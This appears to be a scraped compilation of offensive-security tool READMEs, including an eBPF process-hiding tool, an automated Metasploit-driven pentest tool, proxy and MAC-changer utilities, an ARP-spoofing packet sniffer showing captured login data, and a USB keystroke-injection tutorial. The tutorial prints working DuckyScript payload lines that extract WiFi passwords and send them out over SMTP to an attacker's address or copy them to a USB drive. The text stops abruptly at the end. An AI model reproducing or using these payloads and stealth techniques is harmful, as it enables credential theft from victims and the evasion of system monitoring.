In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.
Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().
Auditd receives its logs via recvfrom(), which stores the messages in a buffer. If a received message was generated by a nysm process through audit_log_end(), nysm replaces the message length in its nlmsghdr header with 0.
Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record. As getdents64() requires looping through all its entries, the eBPF instruction limit is easily reached; therefore, nysm uses tail calls before hitting it.
Hiding sockets is a big claim. In fact, opened sockets are already hidden from many tools, as they cannot find the owning process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the length of all these messages combined. Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.
These are collected from the connect() and bind() calls.
Even with the best effort, nysm still has some limitations.
Every tool that does not close its file descriptors will spot nysm processes created while those descriptors are open. For example, if ./nysm bash is run before top, the processes will not show up. But if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.
Kernel logs: in dmesg and /var/log/kern.log, the message "nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory!" will appear several times because of the eBPF verifier whenever nysm runs.
Many traces written into files are left behind, as hooking read() and write() would be too heavy (though still possible), for example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.
Hiding sockets from ss's recvmsg() can be challenging, as a new socket can appear at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to swap the first entry with the next legitimate socket, but what if a socket is alone in the buffer? Therefore, nysm modifies the first socket's information with hardcoded values.
Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided, as it would hide every non-nysm eBPF object.
Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.
CATSploit is an automated penetration testing tool that uses the Cyber Attack Techniques Scoring (CATS) method and can be used without a pentester. Traditionally, pentesters implicitly select the attack techniques suitable for the systems to be attacked. CATSploit instead uses system configuration information such as the OS, open ports, and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique against the target system. By selecting the highest-scoring techniques, the most appropriate attack technique for the target system can be chosen without the hack knack (a professional pentester's skill).
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input: First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for this, and it can also take prior information about the targets if you have any.
Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, the capture (eVc) and detectability (eVd) values of each attack technique are calculated for every target computer.
Selecting attack techniques by score and building an attack scenario: Attack techniques are selected and attack scenarios are created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) are selected; a small sketch of this selection step is shown after this list.
Executing the attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. It uses Metasploit as a framework and the Metasploit API to execute the actual attacks.
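To make the selection step concrete, here is a minimal sketch of policy-based scenario selection in Python. This is not CATSploit's actual code: the data layout, the tie-breaking rule, and the truncated technique names are assumptions, and the example scores are taken from the scenario list shown later in this section.

# Hypothetical sketch of score-based scenario selection (not CATSploit's real code).
# eVc = capture score, eVd = detectability score, as described above.
scenarios = [
    {"id": "rmgrof", "technique": "exploit/multi/http/drupal_drupageddon", "eVc": 100.0, "eVd": 32.0},
    {"id": "joglhf", "technique": "auxiliary/scanner/ssh/...", "eVc": 70.0, "eVd": 60.0},
    {"id": "3d3ivc", "technique": "exploit/multi/http/jenkins_s...", "eVc": 1.0, "eVd": 32.0},
]

def pick(scenarios, policy="stealth"):
    """Select one scenario according to a pre-defined policy."""
    if policy == "stealth":
        # Hard to detect first: lowest eVd, ties broken by the highest eVc.
        return min(scenarios, key=lambda s: (s["eVd"], -s["eVc"]))
    # Otherwise prefer the best chance of capturing the target.
    return max(scenarios, key=lambda s: s["eVc"])

print(pick(scenarios)["id"])  # -> rmgrof (eVd 32.0, eVc 100.0)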
CATSploit has the following prerequisites:
Metasploit, Nmap, and OpenVAS are assumed to be installed as part of the Kali distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit uses a server-client configuration, and the server reads a JSON configuration file at startup. In config.json, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be run with the -h option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan the network, plan an attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0 β kali β kali 2022.4 β True β
β h_exbiy6 β 192.168.0.10 β β Linux 3.10 - 4.11 β False β
β h_nhqyfq β 192.168.0.20 β β Microsoft Windows 7 SP1 β False β
ββββββββββββ΄ ββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄β ββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4 β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β β β β
βββββββββββββ ββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip β proto β port β service β product β version β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 21 β ftp β ProFTPD β 1.3.5 β
β 192.168.0.10 β tcp β 22 β ssh β OpenSSH β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp β 80 β http β Apache httpd β 2.4.7 β
β 192.168.0.10 β tcp β 445 β netbios-ssn β Samba smbd β 3.X - 4.X β
β 192.168.0.10 β tcp β 631 β ipp β CUPS β 1.7 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ³βββββββββββββββββ
β ip β proto β port β vuln_name β cve β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 0 β TCP Timestamps Information Disclosure β N/A β
β 192.168.0.10 β tcp β 21 β FTP Unencrypted Cleartext Login β N/A β
β 192.168.0.10 β tcp β 22 β Weak MAC Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Encryption Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Host Key Algorithm(s) (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 80 β Test HTTP dangerous methods β N/A β
β 192.168.0.10 β tcp β 80 β Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β CVE-2014-3704 β
β 192.168.0.10 β tcp β 80 β Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β N/A β
β 192.168.0.10 β tcp β 80 β Sensitive File Disclosure (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Unprotected Web App / Device Installers (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Cleartext Transmission of Sensitive Information via HTTP β N/A β
β 192.168.0.10 β tcp β 80 β jQuery < 1.9.0 XSS Vulnerability β CVE-2012-6708 β
β 192.168.0.10 β tcp β 80 β jQuery < 1.6.3 XSS Vulnerability β CVE-2011-4969 β
β 192.168.0.10 β tcp β 80 β Drupal 7.0 Information Disclosure Vulnerability - Active Check β CVE-2011-3730 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-2183 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-6329 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2020-12872 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2011-3389 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2015-0204 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββ
[Users]
βββββββββββββ³ββββββββ
β user name β group β
β‘ββββββββββββββββββββ©
βββββββββββββ΄ββββββββ
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
βββββββββββββββ³βββββ ββββββββ³βββββββββββββββββ³ββββββββ³ββββββββ³ββββββββ³ββββββββββββββββββββββββββββββββ
β scenario id β src host ip β target host ip β eVc β eVd β steps β first attack step β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 3d3ivc β 0.0.0.0 β 192.168.0.10 β 1.0 β 32.0 β 1 β exploit/multi/http/jenkins_sβ¦ β
β 5gnsvh β 0.0.0.0 β 192.168.0.10 β 1.0 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 6nlxyc β 0.0.0.0 β 192.168.0.10 β 0.0 β 48.32 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8jos4z β 0.0.0.0 β 192.168.0.10 β 0.7 β 72.8 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8kmmts β 0.0.0.0 β 192.168.0.10 β 0.0 β 32.0 β 1 β exploit/multi/elasticsearch/β¦ β
β agjmma β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/windows/http/manageeβ¦ β
β joglhf β 0.0.0.0 β 192.168.0.10 β 70.0 β 60.0 β 1 β auxiliary/scanner/ssh/ssh_loβ¦ β
β rmgrof β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β 1 β exploit/multi/http/drupal_drβ¦ β
β xuowzk β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/multi/http/struts_dmβ¦ β
β yttv51 β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β znv76x β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
βββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββ΄ββββββββ΄ββββββββ΄ββββββββ΄ββββββββββββββββββββββββββββββββ
catsploit> scenario detail rmgrof
βββββββββββββββ³βββββββββββββββββ³ββββββββ³βββββββ
β src host ip β target host ip β eVc β eVd β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β
βββββββββββββββ΄ββββββββ ββββββββ΄ββββββββ΄βββββββ
[Steps]
βββββ³ββββββββββββββββββββββββββββββββββββββββ³ββββββββββββββββββββββββ
β # β step β params β
β‘βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ©
β 1 β exploit/multi/http/drupal_drupageddon β RHOSTS: 192.168.0.10 β
β β β LHOST: 192.168.10.100 β
βββββ΄ββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All information and code are provided solely for educational purposes and/or for testing your own systems.
For any inquiries, please contact the following email address:
catsploit@nk.MitsubishiElectric.co.jp
Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.
Clone the Repository:
git clone https://github.com/spyboy-productions/Valid8Proxy.git
Navigate to the Directory:
cd Valid8Proxy
Install Dependencies:
pip install -r requirements.txt
Run the Tool:
python Valid8Proxy.py
Follow Interactive Prompts:
Save to File:
Check Results:
python Validator.py
Follow the prompts:
Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
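For reference, threaded validation of that kind could look roughly like the sketch below. It is not Valid8Proxy's actual code; the test URL, timeout, and thread count are assumptions.

# Hypothetical sketch of multi-threaded proxy validation (not Valid8Proxy's code).
from concurrent.futures import ThreadPoolExecutor
import requests

TEST_URL = "https://httpbin.org/ip"  # assumed endpoint; any reachable URL works

def check(proxy):
    """Return the proxy string if a request routed through it succeeds, else None."""
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        requests.get(TEST_URL, proxies=proxies, timeout=5)
        return proxy
    except requests.RequestException:
        return None

with open("proxy_list.txt") as f:  # one ip:port entry per line
    candidates = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=20) as pool:  # validate with multiple threads
    working = [p for p in pool.map(check, candidates) if p]

print("\n".join(working))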
Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Usage:
Add your proxies to proxies.txt, one per line, in this format: 50.168.163.176:80
How to Use:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
pip3 install -r requirements.txt
python3 PhantomCrawler.py
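Conceptually, the tool rotates requests through the proxies listed in proxies.txt and parses each response. The sketch below illustrates that general idea only; it is not PhantomCrawler's actual code, and the target URL and visit count are placeholders.

# Rough sketch of proxy-rotated page fetches (not PhantomCrawler's actual code).
import random
import requests
from bs4 import BeautifulSoup

TARGET = "https://example.com"  # placeholder target

with open("proxies.txt") as f:  # entries in the ip:port format described above
    proxies = [line.strip() for line in f if line.strip()]

for _ in range(5):  # a handful of simulated visits
    proxy = random.choice(proxies)
    try:
        resp = requests.get(
            TARGET,
            proxies={"http": f"http://{proxy}", "https": f"http://{proxy}"},
            timeout=10,
        )
    except requests.RequestException:
        continue  # skip dead proxies
    soup = BeautifulSoup(resp.text, "html.parser")
    print(proxy, resp.status_code, soup.title.string if soup.title else "")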
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.
Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purposes only.
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to the victim's computer.
The victim's computer must be unlocked.
The victim's computer must have internet access in order to send the stolen data over SMTP (exfiltration over a network medium).
Knowledge of the victim's computer password, for the Linux exploit.
Note:
It is possible to build this tool using a Rubber Ducky, but keep in mind that an RPi Pico costs about $4.00 while the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friendly solution, the Rubber Ducky does offer things like stealthiness and the latest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses the STRING command to inject keystrokes. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is on the target machine. The ENTER/SPACE commands simulate presses of the corresponding keyboard keys.
We use the DELAY command to temporarily pause execution of the payload. This is useful when the payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input commands. For HIDs the setup time is very short, usually a fraction of a second, because the drivers are built in. However, a slower PC may take longer to recognize the pico-ducky, so the general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer or device. Once the data is collected, an adversary can package it, using encryption or compression, to avoid detection while sending it over the network. The two most common ways of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.
Once the passwords have been exported to the .txt file, the payload will send the data to the designated email address using Yahoo SMTP. For more detailed instructions, visit the following link. The payload template also needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL, and your email PASSWORD. In addition, you can also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
Note:
After sending the data over email, the .txt file is deleted. You can also use an SMTP server from another email provider, but be mindful of the SMTP server and port number you write into the payload.
Keep in mind that some networks may block the use of an unknown SMTP server at the firewall.
In order to use the Linux payload (payload2.dd), you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to set up multiple payloads on your RPi Pico, visit this link.
Once the passwords have been exported from the computer, the data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt
In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, for this exploit to succeed you need to know the victim's Linux machine password, which makes the attack less practical.
STRING echo PASSWORD | sudo -S echo
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"
In order to run the wifi_passwords_print.sh script, you will need to update it with the correct name of your USB stick, after which you can type the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD is your account's password and USBSTICK is the name of your USB device.
NetworkManager is based on the concept of connection profiles and uses plugins for reading and writing data. It stores network configuration profiles in an .ini-style keyfile format; the keyfile plugin supports all the connection types and capabilities that NetworkManager has, and the files are located in /etc/NetworkManager/system-connections/. Based on this keyfile format, the payload uses the grep command with a regex to extract the data of interest. For filtering, a positive lookbehind assertion is used ((?<=keyword)). The positive lookbehind assertion matches at a certain position in the string, i.e. right after the keyword, without making that text part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
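The same lookbehind idea can be reproduced with Python's re module on a made-up keyfile snippet; this is only an illustration of the regex, not part of the payload.

# Illustration of the lookbehind regex used to pull ssid/psk values out of a
# NetworkManager keyfile (the sample data below is made up).
import re

keyfile = """\
[wifi]
ssid=WLAN1

[wifi-security]
psk=pass1
"""

ssid = re.search(r"(?<=ssid=).*", keyfile).group()  # matches the text after "ssid=" only
psk = re.search(r"(?<=psk=).*", keyfile).group()    # matches the text after "psk=" only
print(ssid, psk)  # -> WLAN1 pass1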
For more information about NetworkManager, here are some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.
WiFi-password-stealer/resources/wifi_pass.txt:
Wireless_Network_Name    Password
---------------------    --------
WLAN1                    pass1
WLAN2                    pass2
WLAN3                    pass3
One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in: all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details, visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. To run the script successfully you need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below is an example of how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
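For illustration, the template-filling step such a writer performs could be sketched as follows. This is not the repository's actual writer.py; the template file name and placeholder values are assumptions based on the placeholders mentioned above.

# Hypothetical sketch of filling a DuckyScript payload template (not the real writer.py).
import sys

def build_payload(template_path, output_path, values):
    """Replace placeholder tokens in the template with real values."""
    with open(template_path) as f:
        payload = f.read()
    for placeholder, value in values.items():
        payload = payload.replace(placeholder, value)
    with open(output_path, "w") as f:
        f.write(payload)

if __name__ == "__main__":
    os_name, out_file = sys.argv[1], sys.argv[2]  # e.g. "windows payload1.dd"
    if os_name == "windows":
        values = {"RECEIVER_EMAIL": "you@example.com",
                  "SENDER_EMAIL": "burner@example.com",
                  "PASSWORD": "app-password"}
    else:  # linux
        values = {"PASSWORD": "victims-linux-password", "USBSTICK": "MYUSB"}
    build_payload(f"{os_name}_template.dd", out_file, values)  # template name is assumed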
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to succeed, because in order to succeed you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock bug.
sudo.
.MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
$ cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface, -i: Specify the network interface.
--random, -r: Set a random MAC address.
--newmac, -nm: Set a specific MAC address.
--customoui, -co: Set a custom OUI for the MAC address.
--reset, -rs: Reset the MAC address to the original value.
--version, -V: Show the version of the program.
: Show the version of the program.$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0 with your desired network interface.
You must run this script as root (or with sudo) for it to work properly, because changing a MAC address requires root privileges.
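Under the hood, changing a MAC address on Linux usually comes down to bringing the interface down, setting a new hardware address, and bringing it back up. The sketch below illustrates that general mechanism with ip link; it is an assumption about the approach, not MacMaster's actual source.

# Conceptual sketch of how a MAC changer typically works on Linux
# (requires root; this is not MacMaster's actual implementation).
import random
import subprocess

def random_mac(oui="08:00:27"):
    """Build a MAC address from an OUI plus three random octets."""
    tail = ":".join(f"{random.randint(0, 255):02x}" for _ in range(3))
    return f"{oui}:{tail}"

def set_mac(interface, mac):
    subprocess.run(["ip", "link", "set", "dev", interface, "down"], check=True)
    subprocess.run(["ip", "link", "set", "dev", interface, "address", mac], check=True)
    subprocess.run(["ip", "link", "set", "dev", interface, "up"], check=True)

if __name__ == "__main__":
    set_mac("eth0", random_mac())  # replace eth0 with your interface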
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
git clone https://github.com/HalilDeniz/PacketSpy.git
PacketSpy requires the following dependencies to be installed:
pip install -r requirements.txt
To get started with PacketSpy, use the following command-line options:
root@denizhalil:/PacketSpy# python3 packetspy.py --help
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]
options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0
Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************
HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'
Raw Payload:
b'uname=admin&pass=mysecretpassword'
HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------
HTTPS support is still a work in progress.
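For reference, a bare-bones HTTP request sniffer along these lines can be put together with Scapy. This is only a hedged sketch of the general technique: it does not do the ARP spoofing or packet forwarding implied by the -t/-g/--ip-forward options, and it is not PacketSpy's own code.

# Minimal HTTP-request sniffer sketch using Scapy (not PacketSpy's actual code).
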